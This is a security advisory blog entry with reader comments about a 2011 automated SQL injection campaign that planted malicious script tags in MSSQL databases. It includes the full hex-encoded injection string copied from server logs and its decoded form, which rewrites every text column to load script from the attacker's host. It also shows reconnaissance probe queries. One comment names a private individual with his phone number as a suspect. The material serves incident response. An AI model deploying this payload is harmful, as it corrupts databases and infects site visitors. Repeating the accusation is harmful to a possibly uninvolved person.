Threat Level: Infocon green

ISC Diary

Refresh Latest Diaries


SQL Injection Attack happening ATM

Published: 2011-12-01,
Last Updated: 2011-12-07 13:46:52 UTC
by Mark Hofman (Version: 2)

36 comment(s)

We've had several reports (thanks guys) of sites being injected with the following string: 

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

Typically it is inserted into several tables.  From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation.  If you find that you have been infected please let us know and if you can share packets, logs  please upload them on the contact form.

Mark

 

UPDATE:

Thanks to those that posted comments and those that worked behind the scenes.  The injection string is along the lines Terry posted in his comments.  the one I ran across is (note not the whole string is provided)

73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404
320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f5220736
56c65637420632e---------snip----------9746c653e3c7363726970742727202729204645544348204e4558542046524f4d
205461626c655f437572736f722049444f2040542c404320454e4420434c4f5345205461626c655f437572736f7220444
5414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29

Which decodes to: 

declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('------SNIP-------
IN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="XXXX://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor+................

When discovered yesterday about 80 sites showed in Google, this morning about 200, by lunch 1000 and a few minutes ago 4000+.  Targets include ASP sites and Coldfusion (Thanks Will) The attack seems to work on all versions of MSSQL.

The hex will show in the IIS log files, so monitor those. Make sure that applications only have the access they require, so if the page does not need to update a DB, then use an account that can only read.

Sources of the attack vary, it is automated and spreading fairly rapidly. As one of the comments mentioned it looks like lizamoon which infected over 1,000,000 sites earlier this year. 

The trail of the files ends up on "adobeflash page" or fake AV.  Blocking access to the lilupophilupop site will prevent infection of clients should they hit an infected site and be redirected.

Mark H - Shearwater

UPDATE 8/12/2011

Firstly thanks to those that have provided comments and additional information.  As of a few minutes ago the approximate number of sites infected is about 160,000 sites. Looking at where the infections are shows .com, .de, & .uk as the most affected regions.

  • .com - 19,100
  • .au - 167
  • .uk - 25,200
  • .fr - 10,900
  • .in - 1,780
  • .ie - 2,350
  • .ca -1,630
  • .be - 4,580
  • .nl - 14,000
  • .de - 23,200
  • .no - 2,410

Based on information in the log files of some incidents the preparation for the attack goes back a little while. Log records show that at least two weeks prior to the actual injection attack the system is being probed for vulnerable pages as well as attempts to identify the product being used.  For example: 

  • 2011-11-16 05:13:55 176.65.161.71 xxxxxxxx.asp  PAGEID=189%27%29%29%2F%2A%2A%2For%2F
    %2A%2A%2F1%3D%40%40version------snip----|Line_1:_Incorrect_syntax_near_')'
  • 2011-11-17 10:50:01 64.191.13.178   /xxxxxxxxxxx.asp  PAGEID=189%29%2F%2A%2A%2For%2F
    %2A%2A%2F1%3D%40%40version--------snip----Syntax_error_converting_the_
    varchar_value_'189)/**/or/**/1=@@version--'_to_a_column_of_data_type_int.
  • 2011-11-17 14:48:09 213.229.96.13   /xxxxxxxxxxx.asp  PAGEID=189%2F%2A%2A%2For%2F%2A
    %2A%2F1%3D%40%40version%29%29------snip----|Syntax_error_converting_the_
    varchar_value_'189/**/or/**/1=@@version))--'_to_a_column_of_data_type_int.
  • 2011-11-19 22:24:41 94.228.222.41   /xxxxxxxxxxx.asp  PAGEID=189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip----|Line_1:_Incorrect_syntax_near_')'.

From the above you can see that over time there are a few attempts, then the next day the next attempt appears in the log files. The attempts are from different IP addresses, but there certainly is some progression based on responses received. In this instance the PAGEID=189 parameter on page xxxxxxxx.asp is vulnerable.  If you search your log files for 500 errors, go back a few weeks, you will find the probing queries.

If you are still battling this, please make sure that you identify the entry page.  If you restore your DB and bring the system back online without identifying the entry point, then it will only be a matter of time before the system is re-compromised.

I put some things you might look for in the comments section of the diary.  The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.  

When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept.

Mark H - Shearwater

Keywords: SQL Injection attack
36 comment(s)
Top of page

Top of page

Comments

Reminds me of LizaMoon...inject a stored XSS into the webapp's backend db...
posted by Dave, Thu Dec 01 2011, 23:51
For those who want to use curl to play follow the bouncing malware, set the user agent string to a value used by a common browser, i.e --user-agent 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'

If you don't do this, a 404 reponse is returned, but if the client looks like an ordinary browers, it will return a 200 reponse with a javascript redirect in the body. It looks like the bad guys may be tracking repeat visits from the same IP address since subsequet requests even with a common user agent receive a 200 OK header reponse, but there is not content.

The interesting stuff appears to be at hxxp://www2.thebestbesentinel.rr.nu but that's as far as I've tracked it

posted by James, Fri Dec 02 2011, 00:26
we were hit by this, here is the payload from IIS logs:

2011-12-01 17:12:08 W3SVC1505444441 OURIP GET /VALIDPAGE VALIDPARAM=0&VALIDPARAM=122+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29-- 80 - 78.46.28.97 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 200 0 0


set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor?
posted by trevor, Fri Dec 02 2011, 06:40
Yes, same here, the hex code in the access logs was

73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72
posted by Mark, Fri Dec 02 2011, 08:07
The IP address it came from was:

96.9.149.76 - - [30/Nov/2011:15:42:17 -0500]
posted by Mark, Fri Dec 02 2011, 08:09
It's a SQL Server exploit, not dependent on ASP and possibly not IIS either. It hit us and we're running Coldfusion.
posted by Will, Fri Dec 02 2011, 11:12
Thanks Will, I updated the diary.
posted by Mark, Fri Dec 02 2011, 11:20
We got hit from IP 78.46.28.97 @ around 21:14 UTC yesterday - looks like the same hex dump - if you want entire entry from IIS log i can post - the hex dump you provided helped us find this attack vector in our logs to explain the symptoms we dealt with late yesterday- thank you!
posted by JohnW, Fri Dec 02 2011, 15:17
Thanks for working on this guys...for those of us that aren't quite as clever, can you explain for the layperson how this attack happened and what, if anything, we can do to prevent it happening again?
We got hit first time on Friday morning (Australia time). I spent most of yesterday fixing what I could, and now we've been hit again, but in different tables.
Thanks.
posted by PM, Fri Dec 02 2011, 20:06
There is an article I was reading just 10 minutes ago that describes the way the payload works:

http://blog.strictly-software.com/2009/10/two-stage-sql-injection-attack.html
posted by WhizzMan, Fri Dec 02 2011, 20:15
Wouldn't proper sanitation of input from the page prevent this from occurring?
posted by Anonymous, Fri Dec 02 2011, 20:57
I see hits in our content filter touching the sl.php url back to 11/30.
posted by Curious George, Fri Dec 02 2011, 20:58
See: http://blog.dynamoo.com/2010/10/evil-network-specialist-ltd-specialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."
.
posted by PC.Tech, Fri Dec 02 2011, 22:33
So, this script destroys data on our SQL servers, but is not leaving any back doors open, right? Find the sloppy code and clean it up and it shouldn't happen again?
posted by PM, Fri Dec 02 2011, 23:23
If you are a member of AUSCert they can help you find out he extent of the intrusion and how to proceed. But to answer your question yes it is probably bad code somewhere. Try something like burpsuite to help you run a scan of your sure. It won't find everything but should pick up on the issues things like this worm exploit.
posted by Raymond, Sat Dec 03 2011, 00:43
A preliminary fix: revoke select permissions from the SQL login your web code uses on information_schmata views (and probably also sysobjects, syscolumns in vulnerable DBs). Not airtight, but it makes this kind of attack more difficult to execute.
posted by amnesiac, Sat Dec 03 2011, 15:09
Anyone have any transaction logs? lets figure out the insert/exec code that is being used. thats where we'll figure out how this whole thing works
posted by james, Sun Dec 04 2011, 03:22
See: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-04, and the last time suspicious content was found was on 2011-12-04... Over the past 90 days, we found 11 site(s) on this network, including, for example, lilupophilupop .com... that appeared to function as intermediaries for the infection of 6 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1 site(s), including, for example, sweepstakesandcontestsnow .com... that infected 108 other site(s)..."
. [ 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) ]
.
posted by PC.Tech, Sun Dec 04 2011, 16:26
2011-12-01 21:41:37
...
ID=364+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29--&allcount=715&dbeg=141|-|ASP_0113|Script_timed_out 80 - 78.46.28.97 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 500 0 0
posted by Luba, Tue Dec 06 2011, 07:18
Does the title mean that there are ATMs which running Window OS are under the attack of this SQL injection?
posted by Sigrid Wen, Tue Dec 06 2011, 07:40
@Sigrid Wen

ATM=At the moment

...
posted by fmc, Tue Dec 06 2011, 16:29
Hey All,
The pakage is quite vicious. For text fields large enough, the injection string is cleanable but for small text based fields, the injection will wipe out all content in the field.
Double check that your full backups/transactions are running as that is the only recovery if you get hit.
posted by DA, Tue Dec 06 2011, 22:15
I spent 15hours fixing my client website 3 days ago only to have the same thing happen again today.

"></title><script src="http://lilupophilupop.com/sl.php"></script><!-- inserted into every table column. What can i do a prevent this, i just blocked the domain name but i still don`t feel safe
posted by Andy, Wed Dec 07 2011, 07:42
The reason of the problem remains not clear to me.
Who can explain please:
1. Is it a vulnerability in MSSQL server or simple SQL injection - bug in website sources?
2. As far as I understand now it is vulnerability in MSSQL server - so do they plan to release a patch?
posted by grep, Wed Dec 07 2011, 10:37
@Andy - Unfortunately you will need to go through your log files and try and identify the actual page that has been used to inject. search your web logs for 736574 or any request that is quite long. I also look for 500 error messages as there is a likelihood that the SQLinjection caused the server to have a little fit and throw a 500 error. To look for long entries I used awk ( cat filename | awk {'if(length($0)>1500) { print $0}'} )

Then once you have identified it you will need to look what in the page is making it vulnerable and fix the code. A simple length check is a good start, but proper validation is the only way you will address this issue.

Mark
posted by Mark H, Wed Dec 07 2011, 12:02
@grep
1. Is it a vulnerability in MSSQL server or simple SQL injection - bug in website sources?
--- It is not a vulnerability in the actual server, it is an issue with the code on the page or in the backend (some compromised sites were using stored procedures). Basic validation of input will fix the problem.

2. As far as I understand now it is vulnerability in MSSQL server - so do they plan to release a patch?
--- As mentioned above it is an issue with the code, not the product. Just as a word of caution, just because the incidents I am aware of were MSSQL related does not mean that this is limited to MSSQL. It is very possible that other products are being attacked I just haven't had anyone say "my insert fav DB product" has been affected.

Mark H
posted by Mark H, Wed Dec 07 2011, 12:08
Mark, thank you!
Could you please advise
a) how to find the place in the code where exactly vulnerability exists?
b) what exactly should be validated on the input?
posted by grep, Wed Dec 07 2011, 13:07
a) more exactly - I mean how to find specific page/input where vulnerability exists?
posted by grep, Wed Dec 07 2011, 13:09
@Grep
I just updated the diary entry with some additional info. If that doesn't help you, zip up the log file for the day of the compromise and send it to markh.isc at gmail.com or put it somewhere where I can download it from and I'll take a quick look.

M
posted by Mark H, Wed Dec 07 2011, 13:51
@Grep
i think it would be a page with a form on it or a page that uses a query string.
posted by Andy F, Fri Dec 09 2011, 04:59
@Andy

- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will not be blocked when you use just domain name lists..."

Most of the time, the morons calm it down just a bit until the dust settles.
Not the case here:
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-09, and the last time suspicious content was found was on 2011-12-09... Over the past 90 days, we found [u]15[/u] site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com... that appeared to function as intermediaries for the infection of [u]160[/u] other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found [u]21[/u] site(s), including, for example, sweepstakesandcontestsnow .com/, that infected [u]761[/u] other site(s)..."
. [ 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) ]
.
posted by PC.Tech, Fri Dec 09 2011, 17:01
Updated: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-11, and the last time suspicious content was found was on 2011-12-11... Over the past 90 days,we found -15- site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that appeared to function as intermediaries for the infection of -190- other site(s)... We found -30- site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that infected -2122- other site(s)..."
- http://blog.dynamoo.com/2010/10/evil-netwo...specialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."
inetnum: 194.28.112.0 - 194.28.115.255
descr: Specialist
- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."
.
posted by PC.Tech, Sun Dec 11 2011, 14:31
Noticed that rogersplus.ca has been hit by this. over 2040 hits for hXXp://lilupophilupop.com/sl.php within the domain.
Though appears the link is now returning a 404 error.
posted by RCK, Wed Dec 14 2011, 13:06
Wanted to let everyone know that I found 3 more unique IPs in my IIS logs today after finding over 50 SQL injection attempts for these troublemakers.

They are:
173.212.195.36
173.212.213.36
66.197.227.136

And FYI, the string posted above by Mark H. is what helped me find them. So thank you.

My only other question is why isn't anyone showing up on the doorstep of S. Matthew Arcus in Scranton, PA, phone 570-343-8551. ARIN says that all three of the above IP addresses belong to him?
posted by RW, Thu Dec 15 2011, 06:35
Just an FYI that I linked to this page in a blog post: What an IDS analyst does..(for non-geeks). Any feedback appreciated. It is http://idstales.ca/stories.php
posted by IDSTales.ca, Thu Dec 15 2011, 07:03
We were infected with this attack twice.

The first occurrence was on 12/08/11 and somewhat surprisingly, we could find no record of the attack point in the IIS access logs.

The second occurrence was on 12/13/11 and in that instance, we did find the entry point in the logs with the signature mentioned in this report.

We then “replayed” the injection in a secure test environment and what we found in our case was that the SQL statement it runs can take hours to actually complete. Until the SQL statement completes, IIS was waiting to write the entry to the access log because it didn’t have a response yet.

Our theory is that in the first attack, we saw evidence of the database corruption while the SQL was still running and promptly shut down IIS and then SQL Server, causing no log entry to be written into the IIS access logs. During the second attack, we also found evidence of the corruption very quickly, but in that instance, SQL Server was shut down before IIS and therefore IIS was able to log the entry in the access logs.

Our second attack was from the 173.212.195.36 IP mentioned in a previous comment as being registered to the guy in Scranton, PA.
posted by Felix, Fri Dec 16 2011, 17:42

New Comments closed for all Diaries older than two(2) weeks
Please send your comments to our Contact Form

Diary Archives

Top of page
site/port/ip search:

Announcement!

IPv6 Support Added

Our iptables client now supports submitting IPv6 firewall logs.

Get ISC Swag!!

Advertisement

Security News Feeds

InternetStormCenter
SANS Newsbites
SANS @Risk

Diary Archives

Ubuntu Package available to submit firewall logs to DShield - by: Johannes Ullrich (2013-05-20)

Safe - Tools, Tactics and Techniques - by: Guy Bruneau (2013-05-20)

Port 51616 - Got Packets? - by: Kevin Shortt (2013-05-19)

View Diary Archives

Search Diaries:

SANS Institute

View our Privacy Policy

Contact Us

Phone: (757) SANS-ISC (726-7472) - Voice Mail Only
Web Contact: handlers@isc.sans.edu
Report Bugs: Sourceforge Project
Debug Info: Browser Debug Info

"The experiences gained in the SANS Technology Institute program have helped me advance in IBM, taking a more public facing role."
- Jerome Radcliffe, SANS Technology Institute Student

"SANS is a 'giving back to the community factory.' SANS encourages and fosters growing security awareness and growing the security community."
- Rob VandenBrink, Alumni of SANS Technology Institute